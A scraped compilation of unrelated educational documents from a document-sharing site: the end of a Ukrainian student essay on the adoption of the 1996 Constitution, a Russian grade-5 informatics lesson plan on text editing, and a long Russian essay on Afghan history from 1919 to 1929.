Із проголошенням незалежності в Україні розгортається конституційний процес розробка й обговорення різних варіантів нової Конституції, її розділів і статей. Конституційний процес умовно поділяють на два періоди: І період — 1992—1994 рр.; II період — з 1994 р. до прийняття Конституції 1996 р.
7. Підсумок виборів до Верховної Ради в 2002р. У I період була сформована Конституційна комісія на чолі з Президентом Л. Кравчуком і Головою Верховної Ради І. Плющем; до комісії ввійшли також учені-правознавці, судді, працівники правоохоронних органів, народні депутати. Результатом роботи комісії стало створення двох варіантів проекту Конституції, які були винесені на всенародне обговорення. Однак жоден із них прийнятий не був.
ІІ період почався після позачергових виборів Президента України і формування нового складу Верховної Ради. Конституційну комісію очолили Президент України Л. Кучма і Голова Верховної Ради О. Мороз. Нові проекти створювалися представниками різних політичних партій. Найгос-трішими проблемами були механізм прийняття Конституції, форма правління в Україні, питання власності, виборчої системи, державної мови і символіки.
Унаслідок суперечностей між Президентом і Верховною Радою Л. Кучма видав Указ про проведення у вересні 1996 р. Всеукраїнського референдуму щодо прийняття Конституції України. У пошуках компромісу було створено Узгоджувальну комісію на чолі з М. Сиротою. Було розв'язано спірні питання. У ніч на 28 червня 1996 р. більшістю голосів депутатів Верховної Ради Конституція України була прийнята, її текст підписали Президент України і Голова Верховної Ради. Був виданий Указ Президента про введення в дію Конституції України.
Конституція включає 161 статтю і 14 розділів (розділ 15 містить «Перехідні положення»):
Конституція України є демократичною і має найвищу юридичну силу. Вона визначає форму правління, державний устрій, політичний режим України як незалежної, суверенної, правової держави. Найвищою соціальною цінністю за Конституцією є людина; Конституція визначає права, свободи й обов'язки громадян України.
Міністерство освіти і науки України
Вінницький національний технічний університет
Реферат
З дисципліни : “Історія України “
На тему : “Національно – державне відродження
Українського народу. Україна в сучасному світі .
.
Вінниця-2004 |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-redaktirovanie-teksta.html | Урок информатики для 5 класса "Редактирование текста" | https://doc4web.ru/uploads/files/32/c361461833e5da1b3a7444364b234bb2.docx | files/c361461833e5da1b3a7444364b234bb2.docx | Технологическая карта урока. Босова. Информатика . 5 класс. ФГОС.
Урок 12. Редактирование текста.
Планируемые образовательные результаты:
предметные – представление о редактировании как этапе создания текстового документа; умение редактировать несложные текстовые документы на родном языке;
метапредметные – основы ИКТ-компетентности; умение осознанно строить речевое высказывание в письменной форме;
личностные – чувство личной ответственности за качество окружающей информационной среды.
Цели урока:
- систематизировать представления учащихся об этапе редактирования текстового документа;
- актуализировать имеющиеся умения вставки, удаления, замены символа(ов); ввода прописных и строчных букв; разрезания и склеивания
строк; быстрого перемещения по документу.
Этапы урока
Материал ведения урока
Деятельность учащихся
УУД на этапах урока
1
Организационный момент
Дети рассаживаются по местам. Проверяют наличие принадлежностей.
Личностные УУД:
- формирование навыков самоорганизации
- формирование навыков письма
2
Запись домашнего задания.
§8 (5) с. 59-60 РТ: №110, №112.
Работа с дневниками
3
Проверка домашней подготовки
РТ: №103(б, г) № 111
- дети рассказывают, как выполнили домашнее задание
Личностные УУД:
- развитие грамотной речи
4
Повторение
С. 62- 63 Вопросы: 2, 7, 9
- дети читают вопросы и отвечают на них
Познавательные УУД:
- актуализация знаний, полученных на предыдущих уроках;
5
Формулирование темы и целей урока
-Что ты знаешь о профессии «Редактор газеты»?
- Познакомься с обязанностями редактора и скажи, почему его профессия получила такое название?
- теперь вы знаете, почему профессия редактора получила такое название, и мы тоже попробуем себя в роли редакторов. Как мы назовем тему урока?
Что мы должны узнать и чему научиться?
- дети затрудняются ответить;
- читают с экрана об обязанностях редактора и объясняют, что название профессии связано с родом деятельности, т. редактированием материалов;
- редактирование текстов;
-мы должны узнать, что такое редактирование и научиться редактировать текстовой документ.
Регулятивные:
- развитие умения формулировать тему и цель урока в соответствии с задачами и нормами русского языка
6
Объяснения темы
- Основные действия при редактировании документа:
- Запомни! Редактирование – это один из этапов подготовки текстового документа.
- С какими объектами текстового документа можно работать при редактировании? Как происходит этот процесс? Прочитай в учебнике. Расскажи устно. 60 ( 1-3 абзац)
- Как управлять текстовым документом, если он слишком большой?
- Вспомни назначение специальных клавиш:
-Объясни важность редактирования текста, в практической деятельности.
- смотрят видео ролик, запоминают;
- читают с экрана вслух;
- работают с учебником и объясняют, что работать можно не только с символами, но и фрагментами. Чтобы выделить фрагмент, нужно провести по нему мышью с нажатой левой кнопкой. Основные действия с фрагментом: вырезать, копировать, вставить. Фрагмент помещается в специальную область памяти – буфер обмена.
- использовать полы прокрутки и специальные клавиши клавиатуры;
- заполняют таблицу с помощью интерактивной доски;
- важность в грамотности при написании текстовых документов.
Познавательные УУД:
-актуализация сведений из личного опыта;
-формирование навыков чтения
-формирование навыков поиска нужной информации в печатном источнике
- развитие грамотности;
- развитие познавательной активности;
Личностные УУД:
- умение применять знания на практике;
Коммуникативные УУД:
- формирование умения общения со сверстниками, уважительного отношения к одноклассникам;
-умение сдерживать эмоции.
7
Закрепление
Выполни задание в рабочей тетради:
РТ с. 79 № 107, 108,109
Личностные УУД:
-развитие воображения
8
Компьютерный практикум
Выполни упражнения на компьютере
С. 118 - 119 Задание №6, №5
Личностные УУД:
- формирование навыков редактирования текста
Коммуникативные УУД:
- умение работать в парах,
- развитие диалогической речи
9
Итоги урока, рефлексия
Можете ли вы назвать тему урока?
- Вам было легко или были трудности?
- Что у вас получилось лучше всего и без ошибок?
- Какое задание было самым интересным и почему?
- Как бы вы оценили свою работу?
Работа с дневниками
Личностные УУД:
-рефлексия способов и условий
действия, контроль и оценка процесса
и результатов деятельности |
https://doc4web.ru/informatika/urok-po-teme-osnovi-sozdaniya-tml-stranic.html | Урок по теме «Основы создания HTML - страниц» | https://doc4web.ru/uploads/files/23/7efd1ff389e9e32714afe24d5bc36ca2.doc | files/7efd1ff389e9e32714afe24d5bc36ca2.doc | null |
https://doc4web.ru/istoriya/afganistan3.html | Афганистан | https://doc4web.ru/uploads/files/185/b0708bad170ab3ec739f07f0433ad3cd.docx | files/b0708bad170ab3ec739f07f0433ad3cd.docx | Введение.
Великий Октябрь оказал огромное влияния на развитие национально-освободительного движения стран Востока. Провозглашенные Декретом о мире ленинские принципы внешней политики молодого Советского государства стали определяющим фактором советской политики и в отношении Афганистана. Большой резонанс здесь получило обращение Совнаркома РСФСР “Ко всем трудящимся мусульманам России и Востока”, в котором подтверждалось право всех мусульманских народов стать хозяевами своей судьбы. По существу это означало признание Афганистана суверенным и независимым государством. Такая позиция Советского правительства была юридически закреплена Брест-литовским договором, подписанным весной 1918 г., статья 7 которого гласила, что “Персия и Афганистан являются свободными и независимыми государствами”.
Советское правительство, учитывая тот факт, что установление дипломатических отношений с Афганистаном способствовало бы оказанию помощи освободительной борьбе афганского народа, в июле 1918 года предложило учредить в Афганистане своё представительство. Однако эмир Хабибулла-хан под нажимом англичан отверг это предложение. В конце 1918 года с советской стороны была предпринята вторая попытка, вновь натолкнувшаяся на противодействие эмира.
Между тем в самом Афганистане росло широкое недовольство политикой Хабибуллы-хана. В стране увеличивались подати, налоги, участились рекрутские наборы, царило полное беззаконие властей в отношении населения. Фактически власть оказалась в руках временщика, министра финансов Мухаммада Хусейна, представителя зарождавшихся компрадорских кругов, который по существу являлся агентом британского капитала и всячески способствовал усилению английского влияния в стране. Эмир вёл праздную жизнь, игнорируя условия быстро меняющейся обстановки. Его упорное нежелание установить контакты с Советской Республикой, т. е. воспользоваться благоприятными возможностями для достижения Афганистаном независимости, способствовало приближению кризиса внутренней политики и соответственно определяло исход его правления.
Летом 1918 года английские войска вторглись в Советский Туркестан, захватив Кушку, таким образом, с трёх сторон окружили Афганистан (к этому времени они пользовались безраздельным влиянием и в Персии). Внешнеполитическая изоляция, навязанная британскими колонизаторами и фактически законсервированная политикой режима Хабибуллы-хана, превращалась в территориальную изоляцию, подкреплённую непосредственным присутствием британских войск на северных и южных границах Афганистана. Требовались энергичные и радикальные меры для выхода из создавшегося тяжёлого положения.
В сложных условиях внутренней и международной обстановки в стране резко активизировалось деятельность оппозиции. Летом 1918 г. было совершенно покушение на эмира.
Начались массовые репрессии, вызвавшие наряду с тяжёлыми экономическими положением обострение всеобщего недовольства режимом. В ночь с 20 на 21 февраля 1919 г. эмир Хабиббула-хан был убит вблизи Джелалабада. В течение нескольких дней в стране царило двоевластие Брат эмира Насрулан-хан, находившийся в то время в Джелалабаде, провозгласил себя эмиром. В это время третий сын Хабибуллы-хана, принц Аманулла-хан (оставшийся в отсутствие отца наместником в Кабуле), опираясь на части кабульского гарнизона и горожан, также объявил себя эмиром. Он выдвинул в качестве своей ближайшей цели освобождение страны от британской зависимости. Политические симпатии населения оказались на стороне молодого принца. Вскоре Насрулла-хан и некоторые из его сторонников были арестованы. Временщик Мухаммад Хусейн был повешен. Новым эмиром стал Аманулла-хан. Попытка консервативных кругов захватить верховную власть окончилась неудачей.
После отказа британских колониальных властей признать Афганистан независимым в мае 1919 г. начались военные действия между афганской армией и английскими войсками. Несмотря на численное превосходство англичан и лучшую техническую оснащённость их армии, афганцы оказали упорное сопротивление. Борьба Афганистана за независимость способствовала разгрому английских интервентов в за Каспии, а также начавшиеся вооружённое восстание пуштунских, племён в Северо-западной пограничной провинции. Великобритания была вынуждена пойти на мир с Афганистаном . 8 августа 1919 г. в Равалпинди был подписан прелиминарный мирный договор, по которому англичане официально признали полную независимость Афганистана. Так закончился длительный период полуколониальной зависимости этой страны от британского империализма.
Советское государство оказало большую поддержку борьбе афганского народа, первым признав независимость Афганистана в марте 1919 г. В. И. Ленин в своём письме эмиру Аманулле-хану приветствовал независимый афганский народ, подтвердив стремление Страны Советов установить дружеские отношения между двумя государствами. 28 февраля1921 г. был заключен советско-афганский Договор о дружбе, который заложил основы дружественных отношений на долгие годы и явился важным фактором укрепления национального суверенитета Афганистана.
Афганистан в период с 1920 по 1939 года.
Добившись независимости, новое правительство Афганистана приступило к реализации целого комплекса реформ, направленных на ликвидацию экономической отсталости и достижения социального прогресса.
Одним из важнейших преобразований этого периода явилось принятия в 1923 г. первой в истории Афганистана конституции, которая подтвердила независимость страны, объявила эмира носителем верховной власти, декларировала некоторые гражданские свободы. Были созданы Государственный совет–консультативный орган при эмире, Лоя Джирга - всеафганское собрание вождей племён и мусульманских богословов, Дурбари Али - совет правительственных чиновников и правительство, которому была передана исполнительная власть.
Важную часть программы реформ правительства Амануллы-хана составили экономические преобразования. В 1920 г. был принят Закон о налоге на землю, предусматривающий перевод натуральных налогов в денежные. Это ускоряло процесс развитие товарно-денежных отношений. В 1923 г. был издан Закон о налоге со скота, унифицировавших налогообложение всех скотоводов и отметивший дополнительные налоги.
Однако наиболее важным нововведением этих лет, серьёзно повлиявших на последующую эволюцию форм собственности и соответственно структуру социальных отношений в деревне, было положение о продаже государственных земель в Афганистане, принято в 1924 г. Этим актом юридически закреплялась частная собственность на землю, что немало способствовало росту помещичьего землевладения. Почти вся земля была продана помещикам, чиновникам и ростовщикам. Другие мероприятия экономического характера касались переселения части кочевников в северные области страны, конфискации и продажи земель, принадлежавших служителям культа. Была проведена таможенная реформа, а также принят закон о поощрении промышленности.
Реформы младоафганского режима в целом были направлены на устранение наиболее архаичных форм феодального строя и ускорение развития элементов новой социально-экономической формации. Они в значительной степени отвечали интересам зарождавшихся классов – “новых” помещиков и национальной торговой буржуазии, которые были немногочисленны и не имели ещё достаточного экономического веса. В то же время большинства младоафганских преобразований ущемляли позиции консервативных слоёв общества – ортодоксальной верхушки мусульманских богословов, ханов племён, крупных феодальных землевладельцев. Реформы не улучшали положение и крупнейшего производительного класса – крестьянства, не избавляли его от феодальной эксплуатации. Они лишь ускорили процесс обезземеливания крестьян, способствовали усилению их независимости от ростовщиков и помещиков.
Недовольство реформами вылилось в антиправительственный мятеж племён в Хосте, вспыхнувший весной 1924 г. и возглавленный муллами. Мятежники потребовали отмены нового законодательства, восстановления свободной торговли с Британской Индией, отказа от проведения реформ (в основном социально-бытовых), которые муллы объявили противоречащими исламу. Мятежные племена получили поддержку от британских колонизаторов, стремившихся к ослаблению младоафганского режима. Англичане даже попытались поставить во главе движения своего ставленника Абдул Карима, сына бывшего эмира Якуб-хана.
Правительство, будучи не в силах подавить восстание южных племён, пошло на компромисс: на состоявшемся летом 1924 г. Лоя Джирге ему пришлось отказаться от некоторых реформ. Процесс реформации общественно- экономической структуры страны значительно замедлился.
Форматирование новой политико-экономической структуры Афганистана требовало расширения его внешних связей. После восстановления национальной независимости и ликвидации внешнеполитической изоляции правительство Амануллы-хана предприняло энергичные шаги к установлению отношений со многими странами. К 1924г. Афганистан уже поддерживал связи с РСФСР, Англией, Италией, Францией, Германией, Польшей, Бельгией, Турцией, Египтом, Ираном. В 1926 г. был подписан советско-афганский Договор о нейтралитете и взаимном ненападении, который явился важной вехой в развитии отношений между двумя странами и юридически закрепил ставшую традиционной политику нейтралитета Афганистана. В целях дальнейшего расширения внешнеполитических связей Афганистана и укрепления его международного авторитета в конце 1927 г. эмир Аманулла-хан в сопровождении некоторых министров и советников предпринял длительное зарубежное турне.
Маршрут поездки короля Амануллы-хана охватывал Индию, Египет, Италию, Францию, Германию, Англию, Советский Союз, Турцию и Иран. Во время пребывания в Индии король призвал мусульман и индусов к единению в борьбе за свободу, немало встревожив своими антиколониалистскими выступлениями британские колониальные власти. В Египте, фактически находившемся под властью англичан, он выступил с позицией защиты национальной независимости. Пребывание Амануллы-хана в Италии было связано в основном с вопросами закупки оружия. Во Франции он осмотрел крупные промышленные предприятия и договорились также о поставке французского оружия. Визит афганского короля в Германию был связан экономическими соображениями. Аманулла-хан подписал предварительные соглашения о предоставлении германским промышленникам концессии на строительство железных дорог в Афганистане и пригласил в свою страну немецкий инженерно-технический персонал.
Британские власти, принимая у себя афганского короля, пытались всячески оказать на него нажим, демонстрируя ему свою промышленную и военную мощь, намереваясь склонить его к более тесным контактом с Великобританией в ущерб афгано-советским связям. Однако Аманулла-хан отклонил эти попытки.
В мае 1928 г. король прибыл в Москву, тепло встреченный руководителями Советского государства. Во время двух недельного пребывания в Советском Союзе он познакомился с достижениями советского народа в хозяйственном и культурном строительстве. Были подписаны также документы о расширении экономического и культурного сотрудничества между двумя странами.
Визит Амануллы-хана в Турцию и Иран завершился подписанием договоров о дружбе с этими странами, что укрепляло их позиции перед лицом продолжавшейся политической и экономической экспансии западного империализма.
В целом поездка афганского короля оказалась весьма плодотворной, содействовала усилению внешних связей Афганистана, открывала перспективы проведения новых важных преобразований в экономической и внутриполитической жизни страны.
Вернувшись на родину, Аманулла-хан приступил к разработке новой серии реформ, нацеленных на ликвидацию изживавшихся себя феодальных устоев. В конце августа 1928 г. он выступил с проектом новых реформ на заседании Лоя Джирги в Пагмане, в соответствии с которыми крупные феодалы и верхушка племён лишались различных привилегий. Новые реформы ослабляли политические позиции косных мусульманских богословов, подрывавших реформаторский дух правительственной политики. Учреждались светские суды. Все муллы и проповедники должны были пройти переаттестацию. Король и его сторонники пытались модернизировать семейно-брачные отношения, зафиксировав минимальный возраст для вступления в брак. Однако в этом они потерпели неудачу. В октябре на заседании дурбатов сторонники Амануллы-хана выдвинули новые проекты социальных и бытовых реформ, включавшие совместное обучение в школе, направление афганской молодёжи на учёбу за границу, запрещение полигамии, снятие чадры и др.
Важное место в новой программе младоафганского правительства заняли вопросы экономического развития. Стремясь ограничить экономическое влияние иностранного, англо-индийского капитала, монополизировавшего внешнюю и частично внутреннюю торговлю Афганистана, правительство Амануллы-хана стало проводить протекционистскую политику в отношении местного купечества. В 20-х годах в стране появились первые торговые акционерные общества (ширкеты), в которых участвовали и представители правящих кругов, включая эмира.
Попытка объединения национального капитала в ширкеты получило значительное развитие в конце 20-х годов, когда в стране уже насчитывалось около 20 торговых компаний с общим капиталом 5,5-6 млн. афгани. Ширкетам были предоставлены монополии на заготовку и реализацию важнейших товаров. В результате позиции иностранного купечества в Афганистане были несколько ослаблены. К концу 20-х годов национальный капитал осуществлял около 40% всех внешнеторговых операций. На заседании Лоя Джирги в августе 1928 г. Аманулла-хан информировал депутатов о своих переговоров с промышленными кругами стран Запада и о подписании концессионных договоров. Он предложил создать государственный банк, намеривая использовать купеческие капиталы на государственные нужды. Но этот проект не был поддержан купечеством, опасавшиеся доверять государству свои капиталы и требовавшим создание частного банка.
Программа реформ младоафганского правительства предусматривала важные меры в области военного строительства. Предлагая реорганизовать афганскую армию по типу европейских, Амануллы-хан настаивал на введение системы всеобщей воинской повинности взамен принципа добровольности, увеличение срока военной службы от 2 до 3 лет, запрещение замены рекрута и откупа. Поскольку закупка вооружений за границей требовала крупных ассигнований, Амануллы-хан осенью 1928 г, ввёл дополнительный чрезвычайный налог в размере 5 афгани с каждого подданного.
Большое внимание правительство уделяло борьбе с укоренившимся социальными пороками, в частности с бюрократизмом, взяточничеством, контрабандой. Однако дальше призывов и нейтральных планов в этой сфере государственной деятельности дело не пошло: требовалось радикальное изменение самой социальной структуры государства, не входившие в планы афганцев. Было выдвинуто также предложение о реорганизации системы государственного управления. Аманулла-хан предложил создать Национальный совет – прообраз будущего парламента – взамен государственного совета (исполнявшего, как указывалось выше, роль не более как консультативного органа при дворе). Но и это начинание в тех условиях оказалась нереальным ввиду нарастающего противодействия различных слоёв населения всей реформаторской деятельности режима Амануллы-хана.
Некоторые признаки напряжённой обстановки в стране проявлялись уже во время заседания Лоя Джирги. Острый характер дискуссий вокруг предлагаемых законопроектов, откровенное давление Амануллы-хана и его окружения на депутатов, слабо маскируемое нежелание последних поддержать реформы – всё это свидетельствовало о росте политической напряжённости. В самом окружении короля ширились разногласия по вопросу глубины и масштабов социально-экономических преобразований, отсутствовало политическое единство, усиливалось личное соперничество различных лидеров. Радикализм реформ Амануллы-хана увеличивал число его противников. Попытка короля создать партию “Истикляль ва таджаддод” (“Независимость и обновление”) в качестве политической основы модернизации натолкнулось на противодействие группы влиятельных лидеров младоафганского движения, придерживавшихся умеренных взглядов. Опасаясь возникновения оппозиции в высших сферах власти, Аманулла-хан провёл чистку государственного аппарата. При этом лишились своих постов некоторые крупные деятели, приверженцы младоафганских идей. Например, ушли в отставку министр иностранных дел, идеолог младоафганцев Махмуд-бек Тарзи и один из ближайших советников короля, министр обороны Мухаммад Вали-хан, возглавлявший первую афганскую дипломатическую миссию в Москве в1919 г. Их место заняли люди без политической ориентации, но сумевшие войти в доверие к королю. Некоторые из них не скрывали своей враждебности к реформам. В окружении Амануллы-хана царила атмосфера интриг, недоверия, вражды, фракционности.
Сложившаяся к осени 1928 г. расстановка классовых сил в стране свидетельствовала о возникновении широких оппозиционных настроений. В лагере противников реформаторской политики оказалась реакционная верхушка мусульманских богословов, недовольство которой носило широкий и многообразный характер. Она была недовольна многими нововведениями правительства, в первую очередь попытками снизить её общественную и политическую роль, секуляризовать многие стороны общественной жизни, поставить деятельность служителей культа под контроль светских властей. Особое негодование мусульманских фундаменталистов вызвали социально-бытовые реформы, ограничившие их традиционную монополию в сфере семейно-брачных устоев. Именно эти преобразования стали основным объектом их критики. Аманулла-хан был объявлен “безбожником”, “еретиком”, попирающим священные принципы ислама, идущим на поводу у “неверных”. Верхушка мусульманских богословов – наиболее ярый противник буржуазной реформации – стала идеологом антиправительственного движения. К ней примкнули крупные феодалы-землевладельцы, ханы племён, недовольные ограничением их административной власти на местах, лишение традиционных привилегий, сужением беспошлинной торговли (по существу контрабанды) с Британской Индией.
Не осталось в стороне от этого движения и другая часть населения страны – крестьяне, беднейшие скотоводы, ремесленники, кустари. Некоторые социальные мероприятия правительства Аманулла-хана, в частности отмена всякого рода дополнительных налогов и поборов, ликвидация рабства, провозглашение религиозного равноправия, способствовали облегчению феодального гнёта. Однако в целом эти слои не получили прямых выгод от проводимых реформ. Наоборот, в условиях начального этапа перехода страны на путь буржуазного развития их экономическое положение значительно ухудшилось. Увеличился размер земельного налога, составив к концу 20-х годов 45% стоимости урожая. В основном правительственные реформы проводились за счёт крестьянства. Расходы на зарубежную поездку короля, на сделанные им покупки оружия, машин, оборудования тоже легли тяжёлым бременем на крестьянские массы. И, наконец, перевод налогов в денежную форму, и закрепление частной собственности на землю непосредственно отразились на положении крестьян, вызвав важные сдвиги в последующей эволюции крестьянского хозяйства и социальных отношений в деревне. Не имея наличных средств для уплаты налога, крестьянин брал деньги в долг у ростовщика или помещика под залог будущего урожая или своего участка земли, попадая таким образом в долговую кабалу (Экспроприация крестьянских земель, обезземеливание крестьян, принимая всё большие масштабы, продолжались вплоть до апрельской революции 1978 г.). В итоге крестьянство, зависимое от феодалов и ханов, вступило против реформ, ухудшивших его положение, и соответственно против младоафганского режима, составив основную движущую силу антиправительственного движения.
Первые признаки надвигающегося социально-политического кризиса обнаружились осенью 1928 г., когда в некоторых районах к северу от Кабула появились разбойничьи шайки, грабившие местных богачей. Эта была ещё стихийная форма социального протеста крестьян, доведённых до отчаяния многочисленными поборами и произволом местной администрации. Один из таких вооружённых отрядов грабителей возглавил дезертировавший из армии унтер-офицер Хабиббула по прозвищу Бачаи Сакао (сын водоноса). Его отряд вскоре стал совершать нападения на представителей местной власти, причём часть награбленного отдавал беднякам. Действия Бачаи Сакао в северной провинции, поддержка, оказываемая ему местными крестьянами, обеспокоили правительство, которое вынужденно было принимать меры по пресечению его деятельности, впрочем, без видимого успеха.
В тот же период, в ноябре 1928 г., вспыхнуло восстание некоторых пуштунских племён в Восточной провинции, быстро распространившиеся по многим уездам. Губернатор провинции объявил о сборе воинских частей и ополчений племён, одновременно обратившись к восставшим с призывом прекратить мятеж. Центральные власти отправили дополнительные войска в мятежную провинцию. В конце ноября произошли крупные столкновения между армейскими частями и отрядами повстанцев.
Руководители восстания – религиозные лидеры племени шинвари Мухаммад Алам и Мухаммад Афзал выпустили манифест, в котором излагались цели и задачи восставших. Восстание, утверждалось в документе, поднято в “попытке изменить образ правления страной, устранить правителей, которые подвержены взяточничеству и коррупции и задают законы, противоречащие шариату”. Далее объявлялось, что территории, занятые повстанцами, управляются “согласно законам шариата и улемы являются их истинными правителями”. По мнению авторов документа, в основе причин восстания лежали “языческие формы”, Амануллы-хана. Манифест содержал призыв к свержению короля. 9 декабря 1928 г.
Было достигнуто соглашение о перемирии между мятежниками и правительственной делегацией сроком на 10 дней. Однако через несколько дней восстание возобновилось. Мятежники осадили центр провинции г. Джелалабад.
Между тем антиправительственная деятельность Бачаи Сакао усиливалась. Его широкая популярность среди населения Северной провинции привлекла внимание оппозиционных кругов, в первую очередь реакционных богословов, которые решили использовать Бачаи Сакао в борьбе против режима Амануллы-хана. 12 декабря на совещании ханов в деревне Калакан (на родине Бачаи Сакао) его провозгласил эмиром Афганистана под именем Хабиббулы Гази. В этот же день он совершил нападение на уездный город Сарай Ходжа и разоружил местный гарнизон. Его соратник, мелкий помещик Сеид Хусейн, захватил город Джабаль ус-Серадж, гарнизон которого сделал без боя. Бачаи Сакао готовился к захвату Кабула.
Король и его приближенные оказались в сложном положении. Внутри самой правящей верхушки наблюдались страх и растерянность. Некоторые государственные деятели тайно установили связи с Бачаи Сакао. Активизировал свою антиамануллистскую деятельность находившийся в изгнании в Британской Индии видный мусульманский богослов Хазрат-и Шур Базар Моджаддади, высланный Амануллой-ханом. Волнения распространились на другие провинции Афганистана.
Всеобщее недовольство сказалось и на настроениях в армии, большая часть которой состояла из представителей национальных меньшинств, подвергавшихся национальному гнёту. Нелояльными оказались и большинство офицеров, не одобрявших радикальных реформ. Участилось, став затем массовым, дезертирство из армии. 13 декабря отряд Бачаи Сакао численностью до 3 тыс. человек совершил нападение на Кабул, которое ценой больших усилий было отражено.
29 декабря реакционные богословы, используя Бачаи Сакао в качестве своего ставленника, вступили фетву (религиозный эдикт), где пытались обосновать законность притязаний Бачаи Сакао на трон. В фетве подверглись критике политические и социально-бытовые реформы правительства, король обвинял в “безбожии” и объявился низложенным. На пост эмира был выдвинут Бачаи Сакао, который, по утверждению авторов фетвы, будет управлять страной в соответствии с шариатом.
Аманнула-хан, лишившись поддержки основных социальных сил, обратился за помощью к своему племени дуррани. Однако лидеры племени отказались поддержать его в борьбе против мятежных восточных племён и призвали соблюдать правила шариата. Отчаявшийся король послал в Джелалабад для переговоров с повстанцами своего родственника, губернатора Кабула Али Ахмад-хана, втайне питавшего оппозиционные настроения и мечтавшего о троне. В начале января 1929 г. ему удалось добиться перемирия. 5 января в Джелалабаде была создана Джирга местных племён, которая выработала свои требования, включавшие полное восстановление законов шариата, снижение налогов, представительство мулл в государственном аппарате, ликвидацию иностранных миссий, отмену нового уголовно-процессуального кодекса и др.
Нарастание внутреннего кризиса в Афганистане сопровождалось усилением активности британского империализма в регионе. Задолго до восстания английские колониальные власти в Индии занялись строительством фортификационных сооружений и линий коммуникаций на границе с Афганистаном, сюда были стянуты крупные военные силы. В ноябре 1928 г. здесь начались маневры англо-индийских войск.
В это же время в пограничном районе появился известный агент британской разведки полковник Лоуренс, проводивший подрывную работу среди племён пограничной полосы. Афганское правительство отдало распоряжение о его аресте в случае появления на афганской территории.
Англичане пошли на открытое вмешательство в афганские события. Британские самолёты неоднократно нарушали воздушное пространство Афганистана. Английский посланник в Кабуле Хэмфрис имел встречу с Бачаи Сакао и заверил его в своих симпатиях. Напряжённая обстановка в Кабуле вынудила англичан эвакуировать свою дипломатическую миссию. Но их происки против режима Амануллы-хана не прекратились. 22 декабря ими был инспирирован побег из Индийского города Аллахабада внука бывшего эмира Шер Али-хана – Мухаммада Омара, жившего там на содержании британских властей. Мухаммад Омар пытался проникнуть в зону восстания племён и возглавить их выступление против неугодно англичанам Амануллы-хана.
В обстановке усиливающейся изоляции младоафганский режим пошёл на капитуляцию: 9 января 1929 г. был опубликован фирман с отказом от ряда важнейших реформ. Были отменены социально-бытовые реформы, всеобщая воинская повинность, муллы восставлены в прежних правах, учреждался сенат с участием известных улемов, сардаров, ханов и некоторых чиновников. Однако этот шаг уже не мог дать Аманулле-хану даже выигрыша во времени. Режим был обречён. Кабул был фактически осаждён восставшими отрядами Бачаи Сакао.
14 января 1929 г. Аманулла-хан отрёкся от престола в пользу своего старшего брата Инаятуллы-хана и покинул столицу, направляясь в Кандагар. Бачаи Сакао, отказавшийся пойти на перемирие, предложенное новым эмиром, занял Кабул и 19 января был провозглашён эмиром Афганистана. Инаятулла-хан на британском самолёте вылетел а Пешавар, впоследствии присоединившись в Кандагаре к Аманулле-хану.
Так закончился один из важных периодов независимого развития Афганистана. Кризис политики реформ и падение режима Амануллы-хана явились следствием сложного процесса классовой борьбы, отражавшей столкновение старых и новых социальных сил – феодальной реакции и пробивающей себе дорогу молодой национальной буржуазии. Важнейшим компонентом классовых выступлений конца 20-х годов явилось стихийное движение трудовых слоёв, протестовавших против ухудшения своего положения. Массовые выступления крестьянства и бедных скотоводов были использованы в борьбе против младоафганского режима феодальной реакцией, подержанной британским империализмом.
Новая власть в Кабуле во главе с эмиром Бачаи Сакао опиралась на консервативные круги крупнейших феодалов и реакционных богословов, противников реформ. Обвинив Аманнулу-хана в нарушении шариата, новый режим декларировал отмену всех реформ, ущемлявших интересы реакционной оппозицию отмена всеобщей воинской повинности удовлетворяла интересы сепаратистки настроенных ханов племён. Вместе с тем, пытаясь удержать на своей стороне крестьянство, новый эмир объявил об отмене недоимок прошлых лет, дополнительных поборов и налогов.
Сразу же после прихода к власти Бачаи Сакао предпринял попытки консолидировать власть в борьбе с различными претендентами на трон. Его войскам удалось подчинить север, Гератскую провинцию (а в мае 1929 г. захватить даже Кандагар). Однако ряд районов фактически сохранял независимое положение, лишь номинально признавая власть Кабула.
С отменой важнейших реформ младоафганского правительства Афганистан в своём социально-экономическом развитии был отброшен назад. Были закрыты школы, и просвещение попало под контроль мулл, упразднены министерства образования и юстиции, правосудие отдано во власть шариатских судов, женщины лишены даже тех зачатков прав, которые они получили при Аманулле-хане. В первые же дни был создан законодательный орган – совет “Исламие”, состоявший из мулл и крупных ханов.
Экономике страны был также нанесён серьёзный ущерб. Бачаи Сакао прибег к широким конфискациям и грабежу имущества не только сторонников Амануллы-хана, но и значительной части купечества. Внешняя и внутренняя торговля были парализованы. На дорогах участились разбои и грабежи. Национальная промышленность пришла в упадок. Резко возросли цены на важнейшие товары. События 1928г. повлекли за собой полное расстройство государственных финансов. Стремясь пополнить казну, Бачаи Сакао усилил налоговый гнёт. Тем самым отказываясь от своих деклараций. Обманутое крестьянство постепенно отходило от кабульского правителя. Кроме того, оно не было ограждено от произвола и притеснений со стороны налоговой администрации, оставшейся на своих местах после падения правительства Аманулы-хана.
В области внешней политики новому режиму также не удалось добиться успехов. Он не был признан официально ни одним государством. Большинство иностранных дипломатических миссий покинул Кабул в январе – феврале 1929 г. В афганской столице остались лишь турецкое, германское и советское представительства. Правительство Бачаи Сакао не проявило заинтересованности в развитии советско-афганских отношений, которые в этот период серьёзно ухудшились ввиду активизации антисоветского басмаческого движения на территории Афганистана. Кабульский эмир всячески поощрял деятельность басмачей, банды которых не однократно вторгались на территорию СССР, совершали нападения на представителей Советской власти и местное население. Несмотря на неоднократные протесты Советского правительства, кабульским режимом не были приняты меры для пресечения этой антисоветской деятельности.
В течение всего периода правления Бачаи Сакао в Афганистане не прекращалась борьба за власть. Находившийся в Джелалабаде бывший губернатор Кабула Али Ахмад-хан, используя сложившуюся ситуацию и опираясь на войска и некоторые мятежные племена, 20 января объявил себя эмиром Восточной провинции. Он отменил все реформы Амануллы-хана и заявил об аннулировании налоговых задолженностей. В то же время, нуждаясь в деньгах. Он заставил индийских купцов Джелалабада выплатить долги, которые они должны были вернуть правительству Амануллы-хана, и стал собирать налоги с населения за три месяца вперёд. Ориентируясь на англичан, Али Ахмад-хан обратился к ним с призывом об оказании ему финансовой и военной помощи.
Попытка Али Ахмад-хана захватить Кабул окончилась неудачей ввиду дезертирству солдат, а также межплеменных противоречий. Лишившись всякой поддержки, он бежал в Пешавар.
